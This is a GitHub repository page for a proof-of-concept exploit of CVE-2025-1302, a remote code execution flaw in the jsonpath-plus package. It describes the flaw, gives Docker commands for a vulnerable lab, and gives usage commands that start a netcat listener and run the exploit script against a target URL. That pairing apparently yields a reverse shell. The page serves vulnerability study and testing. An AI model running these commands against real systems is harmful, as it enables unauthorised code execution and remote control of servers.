Skip to content

EQSTLab/CVE-2025-1302

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2025-1302

★ CVE-2025-1302 JSONPath-plus RCE PoC ★

2025-02-26.13.57.31.mp4

Lab Setup

docker build -t jsonpath:10.2.0 .
docker run --rm --name jsonpath -p 3000:3000 jsonpath:10.2.0

localhost:3000 image

Description

Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of eval='safe' mode. Note: This is caused by an incomplete fix for CVE-2024-21534.

How to use

Git clone

git clone https://github.com/EQSTLab/CVE-2025-1302.git
cd CVE-2025-1302

Install packages

pip install -r requirements.txt

Command

nc -l -p <LPORT>
python3 CVE-2025-1302.py -u <URL_TO_EXPLOIT> -i <LHOST> -p <LPORT>

Output

image

Result

image

Disclaimer

This repository is not intended to be RCE exploit to CVE-2025-1302. The purpose of this project is to help people learn about this vulnerability, and perhaps test their own applications.

EQST Insight

We publish CVE and malware analysis once a month. If you're interested, please follow the links below to check out our publications. https://www.skshieldus.com/eng/business/insight.do

About

JSONPath-plus Remote Code Execution

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published